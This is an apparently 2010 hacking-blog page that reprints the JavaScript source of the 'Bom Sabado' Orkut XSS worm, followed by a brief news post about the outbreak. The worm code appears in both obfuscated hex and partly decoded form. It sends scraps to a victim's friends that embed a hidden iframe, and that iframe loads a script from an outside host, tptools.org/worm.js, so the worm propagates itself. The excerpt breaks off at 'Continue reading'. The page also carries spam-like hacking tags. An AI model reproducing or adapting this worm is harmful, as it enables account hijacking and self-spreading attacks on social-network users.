Bom sabado! javascript (http://tptools.org/worm.js)
Posted by bomsabado on September 27, 2010 · Leave a Comment
var _0x37a1=[“\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x2E\x58\x4D\x4C\x48\x74\x74\x70″,”\x50\x4F\x53\x54\x5F\x54\x4F\x4B\x45\x4E\x3D”,”\x43\x47\x49\x2E\x50\x4F\x53\x54\x5F\x54\x4F\x4B\x45\x4E”,”\x26\x73\x69\x67\x6E\x61\x74\x75\x72\x65\x3D”,”\x50\x61\x67\x65\x2E\x73\x69\x67\x6E\x61\x74\x75\x72\x65\x2E\x72\x61\x77″,”\x50\x4F\x53\x54″,”\x53\x63\x72\x61\x70\x62\x6F\x6F\x6B\x3F”,”\x6F\x70\x65\x6E”,”\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65″,”\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x78\x2D\x77\x77\x77\x2D\x66\x6F\x72\x6D\x2D\x75\x72\x6C\x65\x6E\x63\x6F\x64\x65\x64\x3B”,”\x73\x65\x74\x52\x65\x71\x75\x65\x73\x74\x48\x65\x61\x64\x65\x72″,”\x26\x73\x63\x72\x61\x70\x54\x65\x78\x74\x3D”,”\x3C\x73\x74\x79\x6C\x65\x2F\x3E\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x74\x79\x6C\x65\x3D\x64\x69\x73\x70\x6C\x61\x79\x3A\x6E\x6F\x6E\x65\x20\x6F\x6E\x6C\x6F\x61\x64\x3D\x22\x61\x20\x3D\x20\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74\x28\x20\x27\x73\x63\x72\x69\x70\x74\x27\x29\x3B\x61\x2E\x73\x72\x63\x20\x3D\x20\x27\x2F\x27\x20\x2B\x20\x27\x2F\x74\x70\x74\x6F\x6F\x6C\x73\x2E\x6F\x27\x2B\x27\x72\x67\x2F\x77\x6F\x72\x6D\x2E\x6A\x73\x27\x2B\x27\x23\x3C\x77\x62\x72\x3E\x23\x27\x3B\x20\x64\x6F\x63\x75\x6D\x65\x6E\x74\x20\x2E\x20\x62\x6F\x64\x79\x20\x2E\x20\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64\x28\x20\x61\x20\x29\x22\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E\x42\x6F\x6D\x20\x53\x61\x62\x61\x64\x6F\x21″,”\x26\x75\x69\x64\x3D”,”\x26\x41\x63\x74\x69\x6F\x6E\x2E\x73\x75\x62\x6D\x69\x74\x3D\x31″,”\x73\x65\x6E\x64″,”\x47\x45\x54″,”\x52\x65\x71\x75\x65\x73\x74\x46\x72\x69\x65\x6E\x64\x73\x3F\x72\x65\x71\x3D\x66\x6C\x26\x75\x69\x64\x3D”,”\x75\x69\x64″,”\x26\x6F\x78\x68\x3D\x31″,”\x77\x68\x69\x6C\x65\x20\x28\x74\x72\x75\x65\x29\x3B\x20\x26\x26\x26\x53\x54\x41\x52\x54\x26\x26\x26″,””,”\x72\x65\x70\x6C\x61\x63\x65″,”\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74″,”\x43\x6F\x6D\x6D\x75\x6E\x69\x74\x79\x4A\x6F\x69\x6E\x3F\x63\x6D\x6D\x3D”,”\x26\x41\x63\x74\x69\x6F\x6E\x2E\x6A\x6F\x69\x6E\x3D\x31″,”\x31\x30\x36\x36\x39\x38\x38\x30\x38″,”\x36″,”\x35\x35\x38\x34\x39\x34″,”\x31\x30\x36\x36\x39\x38\x36\x32\x38″,”\x31\x30\x36\x36\x39\x31\x33\x34\x31″,”\x76\x61\x72\x20\x66\x72\x69\x65\x6E\x64\x73\x20\x3D\x20″,”\x3B”,”\x6C\x69\x73\x74″,”\x64\x61\x74\x61″,”\x69\x64″]; //var _0x37a1 = [Microsoft.XMLHttp,POST_TOKEN=,CGI.POST_TOKEN,&signature=,Page.signature.raw,POST,Scrapbook?,open,Content-Type,application/x-www-form-urlencoded;,setRequestHeader,&scrapText=,<style/>Bom Sabado!,&uid=,&Action.submit=1,send,GET,RequestFriends?req=fl&uid=,uid,&oxh=1,while (true); &&&START&&&,,replace,responseText,CommunityJoin?cmm=,&Action.join=1,106698808,6,558494,106698628,106691341,var friends = ,;,list,data,id] function createXMLHttpRequest() { try {returnĀ new XMLHttpRequest();} catch(e){returnĀ new ActiveXObject(“Microsoft.XMLHttp”);}; } ; var JSHDF = {}; var data = “POST_TOKEN=undefined&signature=undefined” //used for sending scraps function sendScrap(friendID) { var _0x7c2bx5=createXMLHttpRequest(); _0x7c2bx5[“open”](“POST”,”Scrapbook?”,false); _0x7c2bx5[“setRequestHeader”](“Content-Type”,”application/x-www-form-urlencoded;”); _0x7c2bx5[“send”](“POST_TOKEN=undefined&signature=undefined&scrapText=%3Cstyle%2F%3E%3Ciframe%20style%3Ddisplay%3Anone%20onload%3D%22a%20%3D%20document.createElement(%20’script’)%3Ba.src%20%3D%20’%2F’%20%2B%20’%2Ftptools.o’%2B’rg%2Fworm.js’%2B’%23%3Cwbr%3E%23’%3B%20document%20.%20body%20.%20appendChild(%20a%20)%22%3E%3C%2Fiframe%3EBom%20Sabado!&uid=”+friendID+”&Action.submit=1”); } ; //used for getting list of friends function requestFriends() { … Continue reading →
Filed under Anonymous web Surfing, Blogging tips, Cellphone Hacks, Cheats and tricks, Computer Hacking, Cracks and keywords, Data Hiding, Data recovery, Email Hacking, Gmail, Google Hacks, Hack facebook, Hack yahoo, Hacking Basics, Hacking News, Hacking news, Hacks, Hakcking Tools, Hi5 Hacking, Intermediate Hacking, Interviews, Ip Address, Metasploit, Msn Hacks, My Space Hacking, Orkut Hacking, Orkut Tricks, Others, Parental control software, Password Cracking, Password Hacking Software, PTC Hacking, Rapidshare hacks, Registry Hacks, Securtiy tips, Task Manager, Uncategorized, Virus, Viruses, Website Performance Tips, Windows 7 Hacks, Wordpress Thems, Xp tricks, Xss, Youtube Hacking · Tagged with bank hacking, Bom sabado virus, Bom sabado worm, Bom sabado!, Bomsabad, Bomsabado, Bomsabado worm, bomsabdo.wordpress.com, Brazil and India orkut server, crazy hacker, good saturday worm, google, hack, kiss me, make money, make money online, mitm keyloger, Orkut, orkut bom sabado virus, orkut community, Orkut hacked, Orkut Hacking, Orkut twiiter facebook hacked, rafay hacking article, Rafay hacking articles, sexy college girl, tptools.org/worm.js, Virus, viveck, worm, worm virus malware, xss javascript, XSS vulnerability
Orkut Virus Bom Sabado | What do do?
Posted by bomsabado on September 25, 2010 · Leave a Comment
Orkut has been affected by a Virus called Bom Sabado. It is a script that generates a scrap and floods the friend list of the affected orkut user account holder with the “Bom Sabado” messages.There is a chance that orkut may have been hacked. This is the second XSS (cross-site scripting) attack on Orkut, which … Continue reading →
Filed under Hacking News, Orkut Hacking, Xss · Tagged with Bomsabado, Bomsabado orkut, Bomsabado worm, Hacking news, Orkut hacked, Orkut Hacking, Xss